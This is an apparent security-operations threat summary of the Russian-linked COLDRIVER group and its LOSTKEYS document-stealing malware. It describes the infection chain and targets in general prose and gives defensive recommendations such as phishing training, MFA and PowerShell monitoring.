Threat Overview

The Security Operations Center (SOC) has identified a significant threat report published by AlienVault on May 7, 2025. The report details the activities of COLDRIVER, a Russian government-backed threat group that has developed new malware called LOSTKEYS. This malware is designed to steal files and system information from high-profile targets, including Western governments, NGOs, journalists, and individuals related to Ukraine.

Threat Actor Group: COLDRIVER

COLDRIVER is known for its sophisticated cyber operations aimed at intelligence collection for Russia’s strategic interests. The group has been active in various hack-and-leak campaigns targeting the UK and several NGOs. Their primary targets include high-profile individuals, former intelligence officers, and organizations involved in activities related to Ukraine.

Threat Report Details

The threat report provides an in-depth analysis of COLDRIVER’s latest malware, LOSTKEYS. This malware is delivered through a multi-step infection chain that begins with a fake CAPTCHA. The infection process involves the use of PowerShell commands, which help the malware evade detection in virtual machines (VMs). Additionally, LOSTKEYS employs a substitution cipher for decoding, making it more difficult to detect and analyze.

The malware’s primary function is to steal documents and system information from compromised systems. COLDRIVER uses credential phishing techniques to gain initial access to target networks. Once inside, they deploy LOSTKEYS to exfiltrate sensitive data, which is then used for intelligence purposes.

Impact on Targets

The targets of COLDRIVER’s operations are diverse but strategically chosen. Western governments and militaries are primary targets due to their potential to provide valuable intelligence. Journalists and individuals related to Ukraine are also targeted, likely to gather information that can be used to influence public opinion or gain a strategic advantage.

Recommendations for Mitigation

To protect against COLDRIVER’s malware and other similar threats, organizations should implement the following recommendations:

1. Enhance Phishing Awareness: Train employees to recognize and avoid phishing attempts. Regular phishing simulations can help improve awareness and preparedness.
2. Implement Multi-Factor Authentication (MFA): Use MFA for all accounts, especially those with access to sensitive information. This adds an extra layer of security that makes it harder for attackers to gain unauthorized access.
3. Monitor PowerShell Activity: Since COLDRIVER uses PowerShell commands in their infection chain, monitor and restrict PowerShell activity on critical systems. Implement logging and alerting mechanisms to detect suspicious PowerShell scripts.
4. Use Advanced Threat Detection Tools: Deploy advanced threat detection tools that can identify and block malware like LOSTKEYS. These tools should be capable of detecting anomalous behavior and using machine learning algorithms to adapt to new threats.
5. Regularly Update Security Software: Ensure that all security software, including antivirus and anti-malware programs, is up-to-date. Regular updates help protect against the latest known threats.
6. Conduct Regular Security Audits: Perform regular security audits to identify vulnerabilities in your network. Address any identified issues promptly to reduce the risk of a successful attack.
7. Implement Network Segmentation: Segment your network to limit the spread of malware. By isolating critical systems, you can prevent attackers from moving laterally within your network.

Conclusion

The threat posed by COLDRIVER and their new malware, LOSTKEYS, is significant. Organizations must remain vigilant and proactive in their cybersecurity efforts to protect against these advanced threats. By following the recommendations outlined above, organizations can enhance their security posture and reduce the risk of falling victim to COLDRIVER’s operations.

For more detailed information on COLDRIVER and LOSTKEYS, refer to the external references provided:

1. https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
2. https://otx.alienvault.com/pulse/681ba0e01c36344c7ac60892

Please check the following page for additional information: https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos